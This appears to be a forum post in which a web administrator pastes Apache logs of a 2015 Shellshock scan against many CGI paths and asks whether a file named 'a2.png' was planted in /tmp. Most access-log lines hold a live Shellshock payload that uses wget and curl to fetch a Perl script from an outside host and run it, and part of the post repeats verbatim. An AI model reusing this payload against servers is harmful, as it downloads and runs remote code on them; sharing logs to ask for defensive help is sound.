64.15.155.177 - - [25/Aug/2015:09:48:43 -0400] "GET /cgi-bin/php.fcgi HTTP/1.1" 404 214 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:44 -0400] "GET /cgi-bin/calendar.cgi HTTP/1.1" 404 218 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:44 -0400] "GET /cgi-bin/download.cgi HTTP/1.1" 404 218 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:44 -0400] "GET /cgi-bin/light_board.cgi HTTP/1.1" 404 221 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:45 -0400] "GET /cgi-bin/main.cgi HTTP/1.1" 404 214 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:45 -0400] "GET /cgi-bin/search.cgi HTTP/1.1" 404 216 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:45 -0400] "GET /cgi-bin/test.cgi HTTP/1.1" 404 214 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:45 -0400] "GET /cgi-bin/file_up.cgi HTTP/1.1" 404 217 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:45 -0400] "GET /cgi-bin/concept.cgi HTTP/1.1" 404 217 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:45 -0400] "GET /cgi-bin/query.cgi HTTP/1.1" 404 215 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:46 -0400] "GET /cgi-bin/counter.cgi HTTP/1.1" 404 217 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:46 -0400] "GET /cgi-bin/kontakt.cgi HTTP/1.1" 404 217 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:46 -0400] "GET /cgi-bin/backup.cgi HTTP/1.1" 404 216 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:46 -0400] "GET /cgi-bin/firewall.cgi HTTP/1.1" 404 218 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:46 -0400] "GET /cgi-bin/index.cgi HTTP/1.1" 404 215 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:46 -0400] "GET /cgi-bin/index2.cgi HTTP/1.1" 404 216 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:47 -0400] "GET /cgi-bin/reboot.cgi HTTP/1.1" 404 216 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:47 -0400] "GET /cgi-bin/printenv HTTP/1.1" 404 214 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:47 -0400] "GET /cgi-bin/test-cgi HTTP/1.1" 404 214 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png 
64.15.155.177 - - [25/Aug/2015:09:48:47 -0400] "GET /cgi-bin/Count.cgi HTTP/1.1" 404 215 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:47 -0400] "GET /cgi-bin/supply.cgi HTTP/1.1" 404 216 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:48 -0400] "GET /cgi-bin/test.sh HTTP/1.1" 404 213 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:48 -0400] "GET /cgi-bin/upload.cgi HTTP/1.1" 404 216 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:50 -0400] "GET /cgi-sys/php5 HTTP/1.1" 301 246 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:51 -0400] "GET /phppath/cgi_wrapper HTTP/1.1" 301 253 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:51 -0400] "GET /phppath/php HTTP/1.1" 301 245 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"

[Tue Aug 25 09:48:39.688528 2015] [core:error] [pid 24312] [client 64.15.155.177:33663] AH00126: Invalid URI in request GET HTTP/1.1 HTTP/1.1

[Tue Aug 25 09:48:40.877570 2015] [cgi:error] [pid 24306] [client 64.15.155.177:35398] script not found or unable to stat: /var/www/cgi-bin/report.cgi

[Tue Aug 25 09:48:41.042423 2015] [cgi:error] [pid 24331] [client 64.15.155.177:35687] script not found or unable to stat: /var/www/cgi-bin/webmap.cgi

[Tue Aug 25 09:48:41.206167 2015] [cgi:error] [pid 24351] [client 64.15.155.177:35888] script not found or unable to stat: /var/www/cgi-bin/whois.cgi

[Tue Aug 25 09:48:42.543500 2015] [cgi:error] [pid 24186] [client 64.15.155.177:36531] script not found or unable to stat: /var/www/cgi-bin/register.cgi

[Tue Aug 25 09:48:42.880804 2015] [cgi:error] [pid 24306] [client 64.15.155.177:38036] script not found or unable to stat: /var/www/cgi-bin/download.cgi

[Tue Aug 25 09:48:43.047761 2015] [cgi:error] [pid 24331] [client 64.15.155.177:38502] script not found or unable to stat: /var/www/cgi-bin/shop.cgi

[Tue Aug 25 09:48:43.503216 2015] [cgi:error] [pid 24353] [client 64.15.155.177:39001] script not found or unable to stat: /var/www/cgi-bin/profile.cgi

[Tue Aug 25 09:48:43.671687 2015] [cgi:error] [pid 24358] [client 64.15.155.177:39387] script not found or unable to stat: /var/www/cgi-bin/about_us.cgi

[Tue Aug 25 09:48:43.835678 2015] [cgi:error] [pid 24359] [client 64.15.155.177:39632] script not found or unable to stat: /var/www/cgi-bin/php.fcgi

[Tue Aug 25 09:48:44.002389 2015] [cgi:error] [pid 24361] [client 64.15.155.177:39862] script not found or unable to stat: /var/www/cgi-bin/calendar.cgi

[Tue Aug 25 09:48:44.774084 2015] [cgi:error] [pid 24362] [client 64.15.155.177:40930] script not found or unable to stat: /var/www/cgi-bin/download.cgi

[Tue Aug 25 09:48:44.942337 2015] [cgi:error] [pid 24363] [client 64.15.155.177:41177] script not found or unable to stat: /var/www/cgi-bin/light_board.cgi

[Tue Aug 25 09:48:45.108830 2015] [cgi:error] [pid 24365] [client 64.15.155.177:41430] script not found or unable to stat: /var/www/cgi-bin/main.cgi

[Tue Aug 25 09:48:45.291641 2015] [cgi:error] [pid 24283] [client 64.15.155.177:41677] script not found or unable to stat: /var/www/cgi-bin/search.cgi

My question is, does the hacker is trying to plant the virus file name "a2.png" to my /tmp folder? and does the hacker success planting it?

The website I'm handling is on virtual host and I'm using a framework to make it more secure. I'm not just sure If i'm on the right track securing my web server, I only installed fail2ban for the logged-in attempt.

Thank you, Angelito

[Tue Aug 25 09:48:39.688528 2015] [core:error] [pid 24312] [client 64.15.155.177:33663] AH00126: Invalid URI in request GET HTTP/1.1 HTTP/1.1

[Tue Aug 25 09:48:40.877570 2015] [cgi:error] [pid 24306] [client 64.15.155.177:35398] script not found or unable to stat: /var/www/cgi-bin/report.cgi

[Tue Aug 25 09:48:41.042423 2015] [cgi:error] [pid 24331] [client 64.15.155.177:35687] script not found or unable to stat: /var/www/cgi-bin/webmap.cgi

[Tue Aug 25 09:48:41.206167 2015] [cgi:error] [pid 24351] [client 64.15.155.177:35888] script not found or unable to stat: /var/www/cgi-bin/whois.cgi

[Tue Aug 25 09:48:42.543500 2015] [cgi:error] [pid 24186] [client 64.15.155.177:36531] script not found or unable to stat: /var/www/cgi-bin/register.cgi

[Tue Aug 25 09:48:42.880804 2015] [cgi:error] [pid 24306] [client 64.15.155.177:38036] script not found or unable to stat: /var/www/cgi-bin/download.cgi

[Tue Aug 25 09:48:43.047761 2015] [cgi:error] [pid 24331] [client 64.15.155.177:38502] script not found or unable to stat: /var/www/cgi-bin/shop.cgi

[Tue Aug 25 09:48:43.503216 2015] [cgi:error] [pid 24353] [client 64.15.155.177:39001] script not found or unable to stat: /var/www/cgi-bin/profile.cgi

[Tue Aug 25 09:48:43.671687 2015] [cgi:error] [pid 24358] [client 64.15.155.177:39387] script not found or unable to stat: /var/www/cgi-bin/about_us.cgi

[Tue Aug 25 09:48:43.835678 2015] [cgi:error] [pid 24359] [client 64.15.155.177:39632] script not found or unable to stat: /var/www/cgi-bin/php.fcgi

[Tue Aug 25 09:48:44.002389 2015] [cgi:error] [pid 24361] [client 64.15.155.177:39862] script not found or unable to stat: /var/www/cgi-bin/calendar.cgi

[Tue Aug 25 09:48:44.774084 2015] [cgi:error] [pid 24362] [client 64.15.155.177:40930] script not found or unable to stat: /var/www/cgi-bin/download.cgi

[Tue Aug 25 09:48:44.942337 2015] [cgi:error] [pid 24363] [client 64.15.155.177:41177] script not found or unable to stat: /var/www/cgi-bin/light_board.cgi

[Tue Aug 25 09:48:45.108830 2015] [cgi:error] [pid 24365] [client 64.15.155.177:41430] script not found or unable to stat: /var/www/cgi-bin/main.cgi

[Tue Aug 25 09:48:45.291641 2015] [cgi:error] [pid 24283] [client 64.15.155.177:41677] script not found or unable to stat: /var/www/cgi-bin/search.cgi

My question is, does the hacker is trying to plant the virus file name "a2.png" to my /tmp folder? and does the hacker success planting it?

The website I'm handling is on virtual host and I'm using a framework to make it more secure. I'm not just sure If i'm on the right track securing my web server, I only installed fail2ban for the logged-in attempt.